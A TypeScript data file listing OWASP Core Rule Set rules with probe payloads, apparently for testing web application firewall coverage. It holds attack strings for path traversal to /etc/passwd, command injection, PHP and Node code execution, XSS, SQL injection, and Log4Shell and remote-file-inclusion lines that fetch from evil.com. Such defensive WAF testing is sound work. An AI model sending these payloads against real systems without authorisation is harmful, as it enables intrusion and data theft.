import { CRSRuleDefinition } from './types';

/**
 * OWASP Core Rule Set (CRS v3/v4) Rule Database
 * Contains signature mappings, paranoia levels (PL1-PL4), anomaly scores, and probe payloads.
 */
export const OWASP_CRS_RULES: CRSRuleDefinition[] = [
	// 920xxx: Protocol Enforcement
	{
		ruleId: '920280',
		name: 'Request Missing a Host Header',
		category: 'Protocol Enforcement',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'missing_host',
		probeLocation: 'header',
		headerName: 'Host',
		description: 'Enforces HTTP/1.1 requirement for Host header',
	},
	{
		ruleId: '920350',
		name: 'Host Header is a numeric IP address',
		category: 'Protocol Enforcement',
		paranoiaLevel: 1,
		anomalyScore: 3,
		probePayload: '127.0.0.1',
		probeLocation: 'header',
		headerName: 'X-Forwarded-Host',
		description: 'Flags direct IP host access against strict policy',
	},
	{
		ruleId: '920420',
		name: 'Request Content-Type not allowed by policy',
		category: 'Protocol Enforcement',
		paranoiaLevel: 2,
		anomalyScore: 5,
		probePayload: 'application/x-custom-unallowed-mime',
		probeLocation: 'header',
		headerName: 'Content-Type',
		description: 'Blocks disallowed or suspicious Content-Type values',
	},

	// 921xxx: Protocol Attack
	{
		ruleId: '921110',
		name: 'HTTP Request Smuggling',
		category: 'Protocol Attack',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '0\r\n\r\nGET / HTTP/1.1',
		probeLocation: 'body',
		description: 'Detects Transfer-Encoding and Content-Length chunk smuggling anomalies',
	},
	{
		ruleId: '921170',
		name: 'HTTP Parameter Pollution',
		category: 'Protocol Attack',
		paranoiaLevel: 2,
		anomalyScore: 3,
		probePayload: 'param=test1&param=test2',
		probeLocation: 'query',
		description: 'Detects multiple parameters with identical names',
	},
	{
		ruleId: '921180',
		name: 'HTTP Header Injection / CRLF',
		category: 'Protocol Attack',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'value%0d%0aSet-Cookie:+injected=true',
		probeLocation: 'query',
		description: 'Detects carriage return and line feed characters in parameters/headers',
	},

	// 930xxx: Local File Inclusion & Directory Traversal
	{
		ruleId: '930100',
		name: 'Path Traversal Attack (/../)',
		category: 'Path Traversal & LFI',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '../../../../etc/passwd',
		probeLocation: 'query',
		description: 'Detects standard dot-dot-slash path traversal sequences',
	},
	{
		ruleId: '930110',
		name: 'Access to Known OS System Files (Unix /etc/passwd)',
		category: 'Path Traversal & LFI',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '/etc/passwd',
		probeLocation: 'query',
		description: 'Detects direct reference to sensitive Unix system files',
	},
	{
		ruleId: '930120',
		name: 'Access to Windows OS System Files (win.ini)',
		category: 'Path Traversal & LFI',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'c:\\windows\\win.ini',
		probeLocation: 'query',
		description: 'Detects direct reference to sensitive Windows configuration files',
	},
	{
		ruleId: '930130',
		name: 'Restricted File Extension Access (.env / .git)',
		category: 'Path Traversal & LFI',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '.env',
		probeLocation: 'query',
		description: 'Detects requests for configuration files, source control, or secrets',
	},

	// 931xxx: Remote File Inclusion
	{
		ruleId: '931100',
		name: 'Possible Remote File Inclusion (RFI) - URL in Parameter',
		category: 'Remote File Inclusion',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'http://evil.com/shell.txt',
		probeLocation: 'query',
		description: 'Detects external HTTP/HTTPS URL protocols inside parameters',
	},
	{
		ruleId: '931110',
		name: 'RFI via Alternative Protocols (ftp://, data://)',
		category: 'Remote File Inclusion',
		paranoiaLevel: 2,
		anomalyScore: 5,
		probePayload: 'data://text/plain;base64,PD9waHA=',
		probeLocation: 'query',
		description: 'Detects data URI and FTP schemes used in file inclusion',
	},

	// 932xxx: Remote Code Execution (RCE)
	{
		ruleId: '932100',
		name: 'Unix Shell Command Execution (id, whoami, uname)',
		category: 'Command Injection & RCE',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '; id; whoami;',
		probeLocation: 'query',
		description: 'Detects standard Unix command execution utilities',
	},
	{
		ruleId: '932105',
		name: 'Windows Shell Command Execution (cmd.exe / powershell)',
		category: 'Command Injection & RCE',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '& cmd.exe /c dir &',
		probeLocation: 'query',
		description: 'Detects Windows Command Prompt and execution invocations',
	},
	{
		ruleId: '932110',
		name: 'Shell Command Chaining & Metacharacters (| & ` $)',
		category: 'Command Injection & RCE',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '127.0.0.1 | cat /etc/passwd',
		probeLocation: 'query',
		description: 'Detects shell redirection, piping, and backtick command substitution',
	},
	{
		ruleId: '932160',
		name: 'PowerShell / Base64 Script Execution',
		category: 'Command Injection & RCE',
		paranoiaLevel: 2,
		anomalyScore: 5,
		probePayload: 'powershell -enc JABhID0A',
		probeLocation: 'query',
		description: 'Detects encoded PowerShell script invocation flags',
	},

	// 933xxx: PHP Code Injection
	{
		ruleId: '933100',
		name: 'PHP Open Script Tag Injection (<?php)',
		category: 'PHP Code Injection',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '<?php phpinfo(); ?>',
		probeLocation: 'query',
		description: 'Detects inline PHP script open tags',
	},
	{
		ruleId: '933150',
		name: 'PHP Dangerous Function Execution (eval, assert, system)',
		category: 'PHP Code Injection',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'eval(base64_decode($_POST[cmd]))',
		probeLocation: 'query',
		description: 'Detects calls to dangerous PHP execution and evaluation functions',
	},

	// 934xxx: Node.js & Server-Side JavaScript Injection
	{
		ruleId: '934100',
		name: 'Node.js Execution & Globals (require child_process)',
		category: 'Node.js Code Injection',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'require("child_process").execSync("id")',
		probeLocation: 'query',
		description: 'Detects Node.js runtime globals and module imports',
	},
	{
		ruleId: '934120',
		name: 'Prototype Pollution Injection (__proto__ / constructor)',
		category: 'Node.js Code Injection',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '__proto__[polluted]=true',
		probeLocation: 'query',
		description: 'Detects JavaScript prototype pollution property manipulation',
	},

	// 941xxx: Cross-Site Scripting (XSS)
	{
		ruleId: '941100',
		name: 'XSS Filter - HTML Script Tag (<script>)',
		category: 'Cross-Site Scripting (XSS)',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '<script>alert(1)</script>',
		probeLocation: 'query',
		description: 'Detects standard HTML script elements and closures',
	},
	{
		ruleId: '941110',
		name: 'XSS Filter - Inline Event Handlers (onload, onerror)',
		category: 'Cross-Site Scripting (XSS)',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '<img src=x onerror=alert(1)>',
		probeLocation: 'query',
		description: 'Detects inline JavaScript DOM event handlers in HTML tags',
	},
	{
		ruleId: '941130',
		name: 'XSS Filter - JavaScript URI Scheme (javascript:)',
		category: 'Cross-Site Scripting (XSS)',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'javascript:alert(document.cookie)',
		probeLocation: 'query',
		description: 'Detects pseudo-protocol URI execution in attributes or parameters',
	},
	{
		ruleId: '941180',
		name: 'XSS Filter - SVG / XML Vector Injection',
		category: 'Cross-Site Scripting (XSS)',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '<svg/onload=alert(1)>',
		probeLocation: 'query',
		description: 'Detects SVG, XML, and MathML modern XSS vectors',
	},

	// 942xxx: SQL Injection
	{
		ruleId: '942100',
		name: 'SQL Injection - Boolean Based (\' OR 1=1--)',
		category: 'SQL Injection (SQLi)',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: "' OR '1'='1",
		probeLocation: 'query',
		description: 'Detects classic tautology-based SQL injection constructs',
	},
	{
		ruleId: '942140',
		name: 'SQL Injection - Comment Syntax Exploitation (admin\'--)',
		category: 'SQL Injection (SQLi)',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: "admin'--",
		probeLocation: 'query',
		description: 'Detects SQL line and block comment terminations',
	},
	{
		ruleId: '942190',
		name: 'SQL Injection - UNION SELECT Queries',
		category: 'SQL Injection (SQLi)',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'UNION SELECT 1,2,3,4,5--',
		probeLocation: 'query',
		description: 'Detects UNION-based multi-statement data extraction',
	},
	{
		ruleId: '942200',
		name: 'SQL Injection - Heavy Sleep & Timing Functions (BENCHMARK)',
		category: 'SQL Injection (SQLi)',
		paranoiaLevel: 2,
		anomalyScore: 5,
		probePayload: 'BENCHMARK(5000000,MD5(1))',
		probeLocation: 'query',
		description: 'Detects blind time-delay SQL functions (sleep, pg_sleep, waitfor)',
	},

	// 943xxx: Session Fixation
	{
		ruleId: '943100',
		name: 'Session Fixation - Cookie Injection in URL Parameter',
		category: 'Session Fixation',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'JSESSIONID=1234567890abcdef',
		probeLocation: 'query',
		description: 'Detects session identifiers passed through query strings',
	},

	// 944xxx: Java / Deserialization / Log4Shell
	{
		ruleId: '944100',
		name: 'Java JNDI Injection / Log4Shell (${jndi:ldap)',
		category: 'Java & Deserialization',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: '${jndi:ldap://evil.com/a}',
		probeLocation: 'query',
		description: 'Detects Log4j / JNDI protocol lookup strings (CVE-2021-44228)',
	},
	{
		ruleId: '944130',
		name: 'Spring4Shell / Java Beans Introspection',
		category: 'Java & Deserialization',
		paranoiaLevel: 1,
		anomalyScore: 5,
		probePayload: 'class.module.classLoader.URLs[0]=jar:http://evil.com',
		probeLocation: 'query',
		description: 'Detects Spring Framework RCE parameter bindings (CVE-2022-22965)',
	},
];
